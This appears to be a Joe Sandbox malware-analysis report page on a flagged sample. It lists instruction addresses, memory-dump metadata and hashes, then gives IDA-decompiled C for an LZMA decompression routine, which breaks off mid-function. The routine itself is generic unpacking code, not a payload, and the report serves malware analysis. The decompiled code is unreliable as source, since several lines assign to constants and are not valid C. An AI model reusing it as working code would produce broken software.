0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
